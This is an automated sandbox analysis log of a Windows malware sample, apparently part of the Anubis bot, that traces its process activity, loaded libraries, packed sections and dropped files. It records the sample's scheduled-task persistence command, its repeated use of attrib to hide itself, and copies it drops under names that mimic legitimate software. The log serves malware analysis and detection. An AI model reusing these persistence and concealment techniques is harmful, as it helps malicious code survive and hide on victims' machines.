                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "DQmU06kq9I"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "DQmU06kq9I" /tr "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\Desktop\DQmU06kq9I.exe C:\Users\user\Desktop\DQmU06kq9I.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\DQmU06kq9I.exe "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "DQmU06kq9I"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "DQmU06kq9I"
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "DQmU06kq9I"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "DQmU06kq9I" /tr "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "DQmU06kq9I"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "DQmU06kq9I"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
                    Source: DQmU06kq9I.lnk.0.drLNK file: ..\..\..\..\..\..\..\Desktop\DQmU06kq9I.exe
                    Source: DQmU06kq9I.exeStatic file information: File size 1763328 > 1048576
                    Source: DQmU06kq9I.exeStatic PE information: Raw size of fsrfimey is bigger than: 0x100000 < 0x1a3c00
                    Source: Binary string: C:\Users\Badus\OneDrive\Desktop\Projects\Anubis-Master\Bot\Bot\LiteHTTP\obj\x86\Debug\Anubis.pdb source: DQmU06kq9I.exe, DQmU06kq9I.exe, 00000009.00000003.2782245640.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4552478393.0000000008BA2000.00000004.00001000.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4541221969.0000000000552000.00000040.00000001.01000000.00000003.sdmp

                    Data Obfuscation

                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeUnpacked PE file: 0.2.DQmU06kq9I.exe.550000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsrfimey:EW;mhpawist:EW;.taggant:EW; vs :ER;.rsrc:W;
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeUnpacked PE file: 9.2.DQmU06kq9I.exe.550000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsrfimey:EW;mhpawist:EW;.taggant:EW; vs :ER;.rsrc:W;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source (identical result for the sample and all 23 dropped files): reference assemblies.exe.0.dr; windows defender.exe.0.dr; mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe.0.dr; microsoft office.exe.0.dr; internet explorer.exe.0.dr; microsoft.exe.0.dr; google.exe.0.dr; msbuild.exe.0.dr; mozilla maintenance service.exe.0.dr; windows nt.exe.0.dr; windowspowershell.exe.0.dr; DQmU06kq9I.exe; windows portable devices.exe.0.dr; windows photo viewer.exe.0.dr; autoit3.exe.0.dr; microsoft.net.exe.0.dr; common files.exe.0.dr; windows sidebar.exe.0.dr; java.exe.0.dr; msecache.exe.0.dr; windows multimedia platform.exe.0.dr; jdownloader.exe.0.dr; windows media player.exe.0.dr; windows mail.exe.0.dr
                    Static PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
                    Source (identical result for the sample and all 23 dropped files): DQmU06kq9I.exe; windows multimedia platform.exe.0.dr; windows nt.exe.0.dr; windows photo viewer.exe.0.dr; windows portable devices.exe.0.dr; windows sidebar.exe.0.dr; autoit3.exe.0.dr; windowspowershell.exe.0.dr; common files.exe.0.dr; google.exe.0.dr; internet explorer.exe.0.dr; java.exe.0.dr; jdownloader.exe.0.dr; mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe.0.dr; microsoft.exe.0.dr; microsoft office.exe.0.dr; microsoft.net.exe.0.dr; mozilla maintenance service.exe.0.dr; msbuild.exe.0.dr; msecache.exe.0.dr; reference assemblies.exe.0.dr; windows defender.exe.0.dr; windows mail.exe.0.dr; windows media player.exe.0.dr
                    Static PE information: section name: (blank)
                    Static PE information: section name: .idata
                    Static PE information: section name: (blank)
                    Static PE information: section name: fsrfimey
                    Static PE information: section name: mhpawist
                    Static PE information: section name: .taggant
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe Code function: 0_2_07C31310 push eax; ret 0_2_07C312E2
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe Code function: 0_2_07C312C8 push eax; ret 0_2_07C312D2
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe Code function: 0_2_07C312D8 push eax; ret 0_2_07C312E2
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe Code function: 0_2_07C312E8 push eax; ret 0_2_07C312F2
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe Code function: 0_2_07C31288 push eax; ret 0_2_07C312C2
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe Code function: 9_2_07AD0FA0 push eax; ret 9_2_07AD0FAA
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe Code function: 9_2_07AD0F80 push eax; ret 9_2_07AD0F8A
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe Code function: 9_2_07AD0F90 push eax; ret 9_2_07AD0F9A
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe Code function: 9_2_07AD0FC8 push eax; ret 9_2_07AD0F9A
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe Code function: 9_2_07AD0F62 push eax; ret 9_2_07AD0F7A
                    Source (identical result for the sample and all 23 dropped files): DQmU06kq9I.exe; windows multimedia platform.exe.0.dr; windows nt.exe.0.dr; windows photo viewer.exe.0.dr; windows portable devices.exe.0.dr; windows sidebar.exe.0.dr; autoit3.exe.0.dr; windowspowershell.exe.0.dr; common files.exe.0.dr; google.exe.0.dr; internet explorer.exe.0.dr; java.exe.0.dr; jdownloader.exe.0.dr; mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe.0.dr; microsoft.exe.0.dr; microsoft office.exe.0.dr; microsoft.net.exe.0.dr; mozilla maintenance service.exe.0.dr; msbuild.exe.0.dr; msecache.exe.0.dr; reference assemblies.exe.0.dr; windows defender.exe.0.dr; windows mail.exe.0.dr; windows media player.exe.0.dr
                    Static PE information: section name: (blank) entropy: 7.964759279856404
                    Static PE information: section name: fsrfimey entropy: 7.953315584919624

                    Persistence and Installation Behavior

                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe Process created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe Process created: attrib.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File created: C:\Users\user\OneDrive\mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File created: C:\Users\user\OneDrive\msecache.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File created: C:\Users\user\OneDrive\windows media player.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File created: C:\Users\user\OneDrive\jdownloader.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File created: C:\Users\user\OneDrive\internet explorer.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File created: C:\Users\user\OneDrive\common files.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File created: C:\Users\user\OneDrive\google.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File created: C:\Users\user\OneDrive\windows portable devices.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File created: C:\Users\user\OneDrive\mozilla maintenance service.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File created: C:\Users\user\OneDrive\microsoft.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File created: C:\Users\user\OneDrive\java.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe File created: C:\Users\user\OneDrive\windows mail.exe
